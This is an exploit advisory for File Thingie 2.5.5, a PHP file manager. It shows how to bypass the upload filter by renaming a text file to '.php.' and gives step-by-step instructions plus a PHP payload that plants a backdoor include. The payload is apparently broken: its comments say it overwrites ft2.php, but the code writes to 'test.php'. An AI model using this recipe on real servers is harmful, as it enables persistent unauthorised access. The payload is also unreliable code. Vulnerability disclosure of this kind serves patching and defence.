[#]----------------------------------------------------------------------------------------]
[#]  Title: File Thingie v2.5.5 File Security Bypass
[#]  Author: Jeremiah Talamantes (RedTeam Security)
[#]  Website: http://www.redteamsecure.com/labs
[#]  Date: 5/15/2010
[#] 
[#]  Application: File Thingie
[#]  Version: 2.5.5
[#]  Link: http://www.solitude.dk/filethingie/download  
[#]  Description: There are security controls in place that attempt to prevent
[#]  users from uploading PHP files and also renaming them to PHP extensions. However
[#]  advanced security controls do not exist that would prevent a user from uploading
[#]  a text file containing PHP code. An attacker can exploit a weakness in the file
[#]  rename process allowing the attacker to rename a text file (containing code) to a 
[#]  .php extension and execute the script. 
[#]
[#]  This exploit demonstrates a way to backdoor File Thingie by uploading an *.inc file
[#]  that contains a backdoored copy of File Thingie, then uploading a *.txt file 
[#]  containing some PHP code that will overwrite ft2.php to execute the backdoored
[#]  copy of File Thingie. But first the *.txt file has to be renamed to a *.php
[#]  and then executed in the browser.
[#]
[#]  Test Environment
[#]  * Tested on WAMP Server 2.0
[#]  * WAMP running on Windows XP, SP2 (EN)
[#]----------------------------------------------------------------------------------------]


[ EXPLOIT ---------------------------------------------------------------------------------]

1. Login to File Thingie

2. Upload the backdoored copy of File Thingie titled:  backdoor.inc

3. Upload hack.txt (see the contents below)

4. Rename hack.txt by going to the rename section in File Thingie and renaming hack.txt
by typing in the following in the rename box, be sure to add the period at the end:  hack.php.

5. Execute hack.php by opening it in a browser. Example: http://localhost/file_thingie/hack.php
This script will backdoor ft2.php. See backdoor.inc for the modifications to the original
File Thingie source code.

6. The end.

[ EXPLOIT ---------------------------------------------------------------------------------]




[ HACK.TXT ---------------------------------------------------------------------------------]
<?php
#
# After renaming this file to a *.php extension, it opens ft2.php and replaces it with
# an include to the backdoor.inc
#

$backdoor='<?php
include(\'backdoor.inc\');
?>
';

 if (file_exists("ft2.php") && file_exists("backdoor.inc"))
 {
	$config_thingie = "test.php";
	$fh = fopen($config_thingie, 'w');
	fwrite($fh,$backdoor) or die ("");
	fclose($fh);
	echo 'ft2.php has been backdoored.';
} else {
	echo 'Error: ft2.php and/or backdoor.inc do not exist.';
}
?>
[ HACK.TXT ---------------------------------------------------------------------------------]